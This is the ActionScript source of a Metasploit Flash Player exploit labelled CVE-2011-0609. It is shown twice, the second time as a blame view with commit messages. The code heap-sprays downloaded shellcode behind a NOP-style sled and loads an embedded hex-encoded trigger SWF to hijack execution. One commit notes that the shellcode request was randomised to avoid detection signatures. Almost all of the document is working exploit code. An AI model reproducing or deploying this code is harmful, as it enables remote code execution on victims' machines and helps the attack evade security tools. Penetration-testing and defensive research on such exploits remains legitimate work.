metasploit-framework/external/source/exploits/CVE-2011-0609/exploit.as

package {
		import flash.display.*;
		import flash.system.*;
		import flash.utils.*;
		import flash.text.*;
		import flash.utils.ByteArray;
		import flash.events.*;
		import flash.utils.Timer;
		import flash.net.*;
		import flash.external.ExternalInterface;
		import flash.utils.Endian;
		import flash.ui.ContextMenu;

		public class Exploit extends MovieClip {
				private var textbox:TextField = new TextField();
				private var msg:String = "Loading...";
				private var shellcode:String;
				var urlLoader:URLLoader = new URLLoader();

				static const POOL_SIZE:int = 0x20000;
				static var allocs:Array;
				static var pool:ByteArray;
				static var dstSize:int;
				static var allocCount:int;
				static var cevent:Function;
				static var remainder:int;

				public function exploit():void {
						var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
						var urlRequest:URLRequest = new URLRequest(path);
						urlLoader.dataFormat = URLLoaderDataFormat.TEXT; // default
						urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete);
						urlLoader.load(urlRequest);
				}
				
				public function randname(newLength:Number):String{
				  var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
				  var alphabet:Array = a.split("");
				  var randomLetter:String = "";
				  for (var i:Number = 0; i < newLength; i++){
				    randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
				  }
				  return randomLetter;
				}

				public function alloc_shellcode(p:String):void {
						var val:ByteArray = new ByteArray();
						val.endian = Endian.LITTLE_ENDIAN;

						for (var i:int = 0; i< 0x7001 - 134 - 0xc; i++)
						{
								val.writeByte(0x0d);
						}

						for(i = 0; i < 20; i++)
								val.writeByte(0x90);

						val.writeBytes(hextobin(p));

						for(var x:int = 0; x < 400; x++)
						   alloc(val, 1048576 - 3840 - 36, load_trigger);
				}

				public function load_trigger(evt:Event):void {
						var swftrigger:String = "43575309eac70000789cbcbc09601bc5153fbc33bbdad54a3e245f712e4721c64e8c1b27015a4809e01cce0189432e02c5b656b214197ca4969d03dae20492705f218140003b8170849b94aba59c2d502e1d4d42394a4b5b28d01b4a694bf1f77b33bb929c18da7efffff73999dd39debc79f3e6cd9bf76667b44ed14f5694bc3e45f91a5366fbcb154599c53ff9e493cdbace15a62883a60f592aa2c8610a5714802b4ffa8fc4b3caa5a264d4bea563fba2dd91d6968eb0c2f820fe14c5a550886ae39944e07210683602bd542040c1a8efcf2a53625d1d91c55d7142f1a43e828a0c14556c593cffa97838d6d5d59e2914f54c148eb970c38b7d6bbbbacf195acf4b456f86eeeaefe85ad31689db8583e67814ba41c5937a318131c55046e43f9468b74291f6969e753d36597e2acc0764f96d9e754455b6b627b7b6a98c3cfbad4f0ead3d920a0b01f9e2d1479ffaf26b2bae1a1f90e467b1e4e562f10e8b45f4c30fc817a3d133765c3e77d6590af5338ba3201747fe9753520cc81777ec88461b974f5c16940c11ac2a19ffa042a3ab283e6532a8e08c86ad50535d78197d5f20f4ddaf2be314e5b3712dfdfc1945fc7d76befd3e292afe3e3d49a6ff7cd2b84d1f9df66845f9c937eca0bfbf9ce439b87bf50c4ff5c99f3d1d1ef5d66da79e3c436428275ff9ccdf269e55587df292472b50e3b393cacd8ee3af7bf7bd933e6d797fcf2bc7bd74d2f2bfbff0de5deb1fb4f1fef2a4a3c55fd5c93f78e2e0cfdff9ce9b333ebff32fa985a1c5279d5772efdc5f9d7be1495f9b35e6a377bf3ecaa6a7ea64e5978303d78eea98f9febf08f099937e7f1a35f4f4491f544d75df3d26f5e4f4cba6bc7bc5fa39274a3a5fb4f17f6cbfd5936fd1147d516f4728d2ad3786ce8e847bb4355d6dadc64c8c60c4ead497f674b775ae2a0a77754c5ed51d8974c6bbc2e74c0e777547ccc5dd5dab97ad4596dad6d9933f04c014f9a7b6f5445cf5ddddd67aad1720327316aae645dbad786c72644da4b327ee9a432f77436f67b8a7adab335f96b5b6c557b75bebf367cbb7a4cc23cb5645ba3a0a6675b577752febb63ae3d1aeee0eaa75746c72b4adbd27d21dcf9bd9d6d361ad6e1029b76876a1b5ae6c08ae595d9d3d565b277add89fa56bb77595b47a41d1980f42cecea8d47045d630eeff8f44c3f8cb6ceb69e9e48aba72566c597af6eb57a22ba855eac99e6e98e74b646ba09a7ded21a41ab2ef12c085be158a47509bade1d8fb4ba3b23eb7a1675b5463c329fe0ddadbddd1671c2dd6d4399f11eabbb87ca8cee8888e7b5745b6b17a39c32b53556775c47492f1a5b6d81f2d6421b5d578fd52e40a8df1ae8b33c6d9d6bacf63622d58daead6e8f20d26377bd60691be5389c307b9cfa79125f63f7ea98d569235fea10e50df776a3bb22ee5e0da2a843764767db7dc98f477a66b775f7ac9f45d97c55d846b298c8b57b263aab9dd3d6de2e9b9b1f1735f25075d92184886aad2ed1d97c41a5d3506196914bc3567ba43887130e8c0718e7745aa1f648eb70c39b916b74a6adabbbad67bd4b305d0fa3f3ab223ae2ab223d5aa725badbb53a0222dd6df1c5edbdabda3a4b87225c2d32e35e814f428c1f16627a0e44be90a108c495682ce8ea9c0f31ab6f6f27c2e2464b0f41c6cdae4e1b204fd2d5805a5ddd82a245445a57a7eca3abbbabb7b335af5788a76825eeb65a5b45cc2b718b7841d7e991eeb5e86e44b463d2408898a70bc22e2525bf25b72d5fe31abbc642abd35a15e9ae18d2b5e98716970cedb99cfe1ed1b8986be3862b9f9e2d7785dbbb3a232386407d33a369cc881527d2d7adf7d27494ac8c17ae7646f3d4aeae737a579bb6002d9bea69e972e873b5505d8d66b34b88883f53d683412126b8891d2b30d146b47476f5b445d7dbf81ba3b6248d1f4692864ea722abb7a76b49044b526456acadbd1573c6d30285d633eb15a4684c44b6b725dad68d4c8a635613b881d94e583ccba04665c3812f91a20c80da027dd9d2e3284833a32af35ada5641e545eadb3199f35674b5436dc82a470c8ff3e61c10489f907eb525dee395dab823d2da66152c2521cbb451382fb24e28687b188ecc60d672311f0265d200880ca3252cf27d4b08ad18000952353c898782a960a6af45322f339d753973f25bda72a653f1d2d811dd3d4ba01e4833c8da93866f6469aceb50c83c42e564e5cd8c9cdb16e9fe4a5ee682182dd1de9e5eac222d5032106faffd9e0d35ed6e0909c878613d84460cd5a19c1c82f710a8027b8c57b4c5db209cde866e4b8e60fccbd44f0602c3b0908ca659ed6dab5d51cacdb7b1c8d209c3d71f02e3162c5e61b5bb5bd6c8fc82399dadc212900095c323190ac45b2c171045bb0a44a618c3f9484e180a36d98a577e63daf4a130ae362cbfebf28405b06fc888fcf8d08e0b2341821466359dc064d822e4a1ee4840bd4560c6d889a4aba567fdea886b166642bc6ca8f673cc0edf7ca1bcc8f8b07aa07bbaf35beda8c8377b9ca5aab025bc3edc1e893b24785b5a33750a0fc1e183808bac53dbe2505191ee6249e990bc025a746130b4750af9f4ae850a5bd6ddb60aaad8070d391496ba98c55f18de23d674cc11f4281e2f6a894db72d1ca7865c771d00b7bdbe74992d918358d2c115182991d5110b24c0f8d0655c5bdfb5becb8bf82c3bbfc05966b08ac252f7084dbcb86b6da4dbb0abe739fa9394fca843789c53a4c57bba567b577561224017106a6bf56a58610b7bdb7bdac050ac1e11abdb584d583b5bbd925fa7920be15b0dbd2ed47463b7c8205d2c2205b490085b43aa66683eb98236469d9696a2555db6640250cca3
						var bytes:ByteArray = hextobin(swftrigger);

						var ldr:Loader = new Loader();
						ldr.loadBytes(bytes);
						addChild(ldr);
				}

				public function hextobin(hex:String):ByteArray {
						var bytes:ByteArray = new ByteArray();
						var data1:Array = hex.split("");
						var data2:Array = [];

						for(var i:int = 0; i < data1.length; i += 2)
						   data2.push("0x"+data1 [i]+data1[i+1]);

						for(var j:int = 0; j < data2.length; j++)
						   bytes[j] = data2[j];

						return bytes;
				}

				public static function init_pool(val:ByteArray):void
				{
						pool = new ByteArray();
						pool.writeBytes(val);

						while (pool.length < POOL_SIZE)
						{
								var temp:ByteArray = new ByteArray();
								temp.writeBytes(pool);
								pool.writeBytes(temp);
						}
				}

				public static function alloc_event(evt:Event):void {
						var block:ByteArray = new ByteArray();
						block.writeBytes(pool);
						allocs.push(block);
				}
				public static function remainder_event(evt:Event):void {
						var block:ByteArray = new ByteArray();
						block.writeBytes(pool, 0, remainder);
						allocs.push(block);
						cevent(evt);
				}

				public static function alloc(val:ByteArray, size:uint, complete_event:Function):void {
						if (null == allocs)
								allocs = new Array();

						dstSize = size;
						cevent = complete_event
						remainder = dstSize % POOL_SIZE

						init_pool(val);

						var timer:Timer = new Timer(2, dstSize / POOL_SIZE);
						timer.addEventListener(TimerEvent.TIMER, alloc_event);

						if (0!=remainder)
								timer.addEventListener(TimerEvent.TIMER_COMPLETE, remainder_event);
						else
								timer.addEventListener(TimerEvent.TIMER_COMPLETE, complete_event);

						timer.start();
				}

				public static function free():void {
						allocs = null;
				}

				public function urlLoader_complete(evt:Event):void {
						 alloc_shellcode(urlLoader.data);
				}

				public function Exploit()  {
						textbox.height = 320;
						textbox.width = 320;
						textbox.border = true;
						textbox.text = msg;
						addChild(textbox);

						exploit();
				}


		}
}
var ex:Exploit = new Exploit();
Lots of work to make this a lot more reliable =) git-svn-id: file:///home/svn/framework3/trunk@12146 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-26 06:35:28 +00:00			`package {`
			`import flash.display.*;`
			`import flash.system.*;`
			`import flash.utils.*;`
			`import flash.text.*;`
			`import flash.utils.ByteArray;`
			`import flash.events.*;`
			`import flash.utils.Timer;`
			`import flash.net.*;`
			`import flash.external.ExternalInterface;`
			`import flash.utils.Endian;`
			`import flash.ui.ContextMenu;`

			`public class Exploit extends MovieClip {`
			`private var textbox:TextField = new TextField();`
			`private var msg:String = "Loading...";`
			`private var shellcode:String;`
			`var urlLoader:URLLoader = new URLLoader();`

			`static const POOL_SIZE:int = 0x20000;`
			`static var allocs:Array;`
			`static var pool:ByteArray;`
			`static var dstSize:int;`
			`static var allocCount:int;`
			`static var cevent:Function;`
			`static var remainder:int;`

			`public function exploit():void {`
made the shellcode request random to avoid signatures git-svn-id: file:///home/svn/framework3/trunk@12148 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-26 16:00:52 +00:00			`var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";`
Lots of work to make this a lot more reliable =) git-svn-id: file:///home/svn/framework3/trunk@12146 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-26 06:35:28 +00:00			`var urlRequest:URLRequest = new URLRequest(path);`
			`urlLoader.dataFormat = URLLoaderDataFormat.TEXT; // default`
			`urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete);`
			`urlLoader.load(urlRequest);`
			`}`
made the shellcode request random to avoid signatures git-svn-id: file:///home/svn/framework3/trunk@12148 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-26 16:00:52 +00:00
			`public function randname(newLength:Number):String{`
			`var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";`
			`var alphabet:Array = a.split("");`
			`var randomLetter:String = "";`
			`for (var i:Number = 0; i < newLength; i++){`
			`randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];`
			`}`
			`return randomLetter;`
			`}`
Lots of work to make this a lot more reliable =) git-svn-id: file:///home/svn/framework3/trunk@12146 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-26 06:35:28 +00:00
			`public function alloc_shellcode(p:String):void {`
			`var val:ByteArray = new ByteArray();`
			`val.endian = Endian.LITTLE_ENDIAN;`

			`for (var i:int = 0; i< 0x7001 - 134 - 0xc; i++)`
			`{`
			`val.writeByte(0x0d);`
			`}`

			`for(i = 0; i < 20; i++)`
			`val.writeByte(0x90);`

			`val.writeBytes(hextobin(p));`

			`for(var x:int = 0; x < 400; x++)`
			`alloc(val, 1048576 - 3840 - 36, load_trigger);`
			`}`

			`public function load_trigger(evt:Event):void {`
			var swftrigger:String = "43575309eac70000789cbcbc09601bc5153fbc33bbdad54a3e245f712e4721c64e8c1b27015a4809e01cce0189432e02c5b656b214197ca4969d03dae20492705f218140003b8170849b94aba59c2d502e1d4d42394a4b5b28d01b4a694bf1f77b33bb929c18da7efffff73999dd39debc79f3e6cd9bf76667b44ed14f5694bc3e45f91a5366fbcb154599c53ff9e493cdbace15a62883a60f592aa2c8610a5714802b4ffa8fc4b3caa5a264d4bea563fba2dd91d6968eb0c2f820fe14c5a550886ae39944e07210683602bd542040c1a8efcf2a53625d1d91c55d7142f1a43e828a0c14556c593cffa97838d6d5d59e2914f54c148eb970c38b7d6bbbbacf195acf4b456f86eeeaefe85ad31689db8583e67814ba41c5937a318131c55046e43f9468b74291f6969e753d36597e2acc0764f96d9e754455b6b627b7b6a98c3cfbad4f0ead3d920a0b01f9e2d1479ffaf26b2bae1a1f90e467b1e4e562f10e8b45f4c30fc817a3d133765c3e77d6590af5338ba3201747fe9753520cc81777ec88461b974f5c16940c11ac2a19ffa042a3ab283e6532a8e08c86ad50535d78197d5f20f4ddaf2be314e5b3712dfdfc1945fc7d76befd3e292afe3e3d49a6ff7cd2b84d1f9df66845f9c937eca0bfbf9ce439b87bf50c4ff5c99f3d1d1ef5d66da79e3c436428275ff9ccdf269e55587df292472b50e3b393cacd8ee3af7bf7bd933e6d797fcf2bc7bd74d2f2bfbff0de5deb1fb4f1fef2a4a3c55fd5c93f78e2e0cfdff9ce9b333ebff32fa985a1c5279d5772efdc5f9d7be1495f9b35e6a377bf3ecaa6a7ea64e5978303d78eea98f9febf08f099937e7f1a35f4f4491f544d75df3d26f5e4f4cba6bc7bc5fa39274a3a5fb4f17f6cbfd5936fd1147d516f4728d2ad3786ce8e847bb4355d6dadc64c8c60c4ead497f674b775ae2a0a77754c5ed51d8974c6bbc2e74c0e777547ccc5dd5dab97ad4596dad6d9933f04c014f9a7b6f5445cf5ddddd67aad1720327316aae645dbad786c72644da4b327ee9a432f77436f67b8a7adab335f96b5b6c557b75bebf367cbb7a4cc23cb5645ba3a0a6675b577752febb63ae3d1aeee0eaa75746c72b4adbd27d21dcf9bd9d6d361ad6e1029b76876a1b5ae6c08ae595d9d3d565b277add89fa56bb77595b47a41d1980f42cecea8d47045d630eeff8f44c3f8cb6ceb69e9e48aba72566c597af6eb57a22ba855eac99e6e98e74b646ba09a7ded21a41ab2ef12c085be158a47509bade1d8fb4ba3b23eb7a1675b5463c329fe0ddadbddd1671c2dd6d4399f11eabbb87ca8cee8888e7b5745b6b17a39c32b53556775c47492f1a5b6d81f2d6421b5d578fd52e40a8df1ae8b33c6d9d6bacf63622d58daead6e8f20d26377bd60691be5389c307b9cfa79125f63f7ea98d569235fea10e50df776a3bb22ee5e0da2a843764767db7dc98f477a66b775f7ac9f45d97c55d846b298c8b57b263aab9dd3d6de2e9b9b1f1735f25075d92184886aad2ed1d97c41a5d3506196914bc3567ba43887130e8c0718e7745aa1f648eb70c39b916b74a6adabbbad67bd4b305d0fa3f3ab223ae2ab223d5aa725badbb53a0222dd6df1c5edbdabda3a4b87225c2d32e35e814f428c1f16627a0e44be90a108c495682ce8ea9c0f31ab6f6f27c2e2464b0f41c6cdae4e1b204fd2d5805a5ddd82a245445a57a7eca3abbbabb7b335af5788a76825eeb65a5b45cc2b718b7841d7e991eeb5e86e44b463d2408898a70bc22e2525bf25b72d5fe31abbc642abd35a15e9ae18d2b5e98716970cedb99cfe1ed1b8986be3862b9f9e2d7785dbbb3a232386407d33a369cc881527d2d7adf7d27494ac8c17ae7646f3d4aeae737a579bb6002d9bea69e972e873b5505d8d66b34b88883f53d683412126b8891d2b30d146b47476f5b445d7dbf81ba3b6248d1f4692864ea722abb7a76b49044b526456acadbd1573c6d30285d633eb15a4684c44b6b725dad68d4c8a635613b881d94e583ccba04665c3812f91a20c80da027dd9d2e3284833a32af35ada5641e545eadb3199f35674b5436dc82a470c8ff3e61c10489f907eb525dee395dab823d2da66152c2521cbb451382fb24e28687b188ecc60d672311f0265d200880ca3252cf27d4b08ad18000952353c898782a960a6af45322f339d753973f25bda72a653f1d2d811dd3d4ba01e4833c8da93866f6469aceb50c83c42e564e5cd8c9cdb16e9fe4a5ee682182dd1de9e5eac222d5032106faffd9e0d35ed6e0909c878613d84460cd5a19c1c82f710a8027b8c57b4c5db209cde866e4b8e60fccbd44f0602c3b0908ca659ed6dab5d51cacdb7b1c8d209c3d71f02e3162c5e61b5bb5bd6c8fc82399dadc212900095c323190ac45b2c171045bb0a44a618c3f9484e180a36d98a577e63daf4a130ae362cbfebf28405b06fc888fcf8d08e0b2341821466359dc064d822e4a1ee4840bd4560c6d889a4aba567fdea886b166642bc6ca8f673cc0edf7ca1bcc8f8b07aa07bbaf35beda8c8377b9ca5aab025bc3edc1e893b24785b5a33750a0fc1e183808bac53dbe2505191ee6249e990bc025a746130b4750af9f4ae850a5bd6ddb60aaad8070d391496ba98c55f18de23d674cc11f4281e2f6a894db72d1ca7865c771d00b7bdbe74992d918358d2c115182991d5110b24c0f8d0655c5bdfb5becb8bf82c3bbfc05966b08ac252f7084dbcb86b6da4dbb0abe739fa9394fca843789c53a4c57bba567b577561224017106a6bf56a58610b7bdb7bdac050ac1e11abdb584d583b5bbd925fa7920be15b0dbd2ed47463b7c8205d2c2205b490085b43aa66683eb98236469d9696a2555db6640250cca3
			`var bytes:ByteArray = hextobin(swftrigger);`

			`var ldr:Loader = new Loader();`
			`ldr.loadBytes(bytes);`
			`addChild(ldr);`
			`}`

			`public function hextobin(hex:String):ByteArray {`
			`var bytes:ByteArray = new ByteArray();`
			`var data1:Array = hex.split("");`
			`var data2:Array = [];`

			`for(var i:int = 0; i < data1.length; i += 2)`
			`data2.push("0x"+data1 [i]+data1[i+1]);`

			`for(var j:int = 0; j < data2.length; j++)`
			`bytes[j] = data2[j];`

			`return bytes;`
			`}`

			`public static function init_pool(val:ByteArray):void`
			`{`
			`pool = new ByteArray();`
			`pool.writeBytes(val);`

			`while (pool.length < POOL_SIZE)`
			`{`
			`var temp:ByteArray = new ByteArray();`
			`temp.writeBytes(pool);`
			`pool.writeBytes(temp);`
			`}`
			`}`

			`public static function alloc_event(evt:Event):void {`
			`var block:ByteArray = new ByteArray();`
			`block.writeBytes(pool);`
			`allocs.push(block);`
			`}`
			`public static function remainder_event(evt:Event):void {`
			`var block:ByteArray = new ByteArray();`
			`block.writeBytes(pool, 0, remainder);`
			`allocs.push(block);`
			`cevent(evt);`
			`}`

			`public static function alloc(val:ByteArray, size:uint, complete_event:Function):void {`
			`if (null == allocs)`
			`allocs = new Array();`

			`dstSize = size;`
			`cevent = complete_event`
			`remainder = dstSize % POOL_SIZE`

			`init_pool(val);`

			`var timer:Timer = new Timer(2, dstSize / POOL_SIZE);`
			`timer.addEventListener(TimerEvent.TIMER, alloc_event);`

			`if (0!=remainder)`
			`timer.addEventListener(TimerEvent.TIMER_COMPLETE, remainder_event);`
			`else`
			`timer.addEventListener(TimerEvent.TIMER_COMPLETE, complete_event);`

			`timer.start();`
			`}`

			`public static function free():void {`
			`allocs = null;`
			`}`

			`public function urlLoader_complete(evt:Event):void {`
			`alloc_shellcode(urlLoader.data);`
			`}`

			`public function Exploit() {`
			`textbox.height = 320;`
			`textbox.width = 320;`
			`textbox.border = true;`
			`textbox.text = msg;`
			`addChild(textbox);`

			`exploit();`
			`}`


			`}`
			`}`
			`var ex:Exploit = new Exploit();`